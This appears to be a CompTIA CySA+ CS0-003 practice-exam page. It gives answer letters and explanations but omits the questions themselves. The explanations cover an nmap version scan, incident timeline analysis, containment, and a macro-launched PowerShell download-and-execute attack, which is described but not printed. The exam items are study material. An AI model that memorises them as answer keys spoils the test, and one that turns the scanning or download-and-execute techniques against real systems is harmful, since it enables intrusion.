Get CompTIA CS0-003 Exam Practice Questions - Real and Updated

Answer : C

The analyst used the command nmap -sV -T4 -F insecure.org to discover the application versions on the vulnerable website. The -sV option in Nmap is used to perform version detection, which identifies the versions of the services running on open ports. The -T4 option sets the timing template for faster execution, and -F scans only the most common ports.

Answer : B

To identify the initial compromise, the analyst should start with the earliest suspicious activity in the timeline and pivot into the audit logs for the principal (identity) associated with that first alert.

Here, the first notable event is 02:00 excessive API failures tied to jdoe12@myorg.com. That commonly indicates password guessing, token misuse, or other authentication abuse attempts. The next events (02:15 metadata service access, 05:10 mass VM creation by a service account, 05:40 malware) look like follow-on activity after an initial foothold. Therefore, the best first step is to check whether those API failures were followed by any successful API calls by that user and then correlate those successful actions to the later stages in project staging-01.

This approach aligns with CySA+ guidance that analysts should use logs + timestamps to build a timeline and correlate events across identities/systems to understand scope and progression:

Sybex emphasizes correlating events from multiple sources and using that correlation to determine scope and impact:

Exact extract (Sybex Study Guide): ''Security analysts are often asked to help analyze that data... Knowing if other events are correlated with the initial event... [and] understanding what systems, users, services, or other assets were involved...''

Secbay underscores that logs and timestamps are key to forming an accurate incident timeline (which is exactly what we're doing by starting from the earliest alert):

Exact extract (Secbay Press): ''System and application logs with timestamps help create a timeline of events, aiding in understanding when specific actions occurred during the incident.''

Why Option B is best vs. the others

B starts with the earliest suspicious identity and seeks successful API activity that would confirm compromise and explain subsequent actions (metadata access service account actions malware).

A is too broad initially (''all activity under project staging-01'') and anchors on a VM that only appears later; it's not the best first pivot when you already have an earlier suspect identity.

C starts at the compute-instance phase (05:10) rather than the earliest authentication/API anomaly (02:00), so it's more likely to find post-compromise actions rather than the initial entry.

D anchors on a specific later VM (fd031f) and compute APIs, again likely after the initial compromise.

Reference (CompTIA CySA+ CS0-003 documents / study guides used):

Mike Chapple & David Seidl, CompTIA CySA+ Study Guide (CS0-003): correlate other events with the initial event; identify involved users/systems/services

Secbay Press, CompTIA CySA+ Exam Prep Guide (CS0-003): logs + timestamps build a timeline of events and support analysis of incident progression

Answer : C

After detecting a compromised email server and unusual network traffic, the next step in incident response is containment, to prevent further damage or spread of the compromise.Reference:CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.

Answer : C

Comprehensive and Detailed Step-by-Step Performing a vulnerability scan during the recovery phase ensures that corrective actions, such as patches or configuration changes, have effectively addressed the vulnerabilities exploited during the incident. This step validates the system's security before fully restoring operations.

CompTIA CySA+ Objectives (Domain 3.0 - Incident Response)

CompTIA CySA+ Practice Tests (Chapter 3: Containment, Eradication, and Recovery)

Answer : A

An Office document with a malicious macro was opened is the most likely explanation for the suspicious activity on the company laptop, as it reflects the common technique of using macros to execute PowerShell commands that download and run malware. A macro is a piece of code that can automate tasks or perform actions in an Office document, such as a Word file or an Excel spreadsheet. Macros can be useful and legitimate, but they can also be abused by threat actors to deliver malware or perform malicious actions on the system. A malicious macro can be embedded in an Office document that is sent as an attachment in a phishing email or hosted on a compromised website. When the user opens the document, they may be prompted to enable macros or content, which will trigger the execution of the malicious code. The malicious macro can then use PowerShell, which is a scripting language and command-line shell that is built into Windows, to perform various tasks, such as downloading and running malware from a remote URL, bypassing security controls, or establishing persistence on the system. The log excerpt shows that PowerShell was used to download a string from a URL using the WebClient.DownloadString method, which is a common way to fetch and execute malicious code from the internet. The log also shows that PowerShell was used to invoke an expression (iex) that contains obfuscated code, which is another common way to evade detection and analysis. The other options are not as likely as an Office document with a malicious macro was opened, as they do not match the evidence in the log excerpt. A credential-stealing website was visited is possible, but it does not explain why PowerShell was used to download and execute code from a URL. A phishing link in an email was clicked is also possible, but it does not explain what happened after the link was clicked or how PowerShell was involved. A web browser vulnerability was exploited is unlikely, as it does not explain why PowerShell was used to download and execute code from a URL.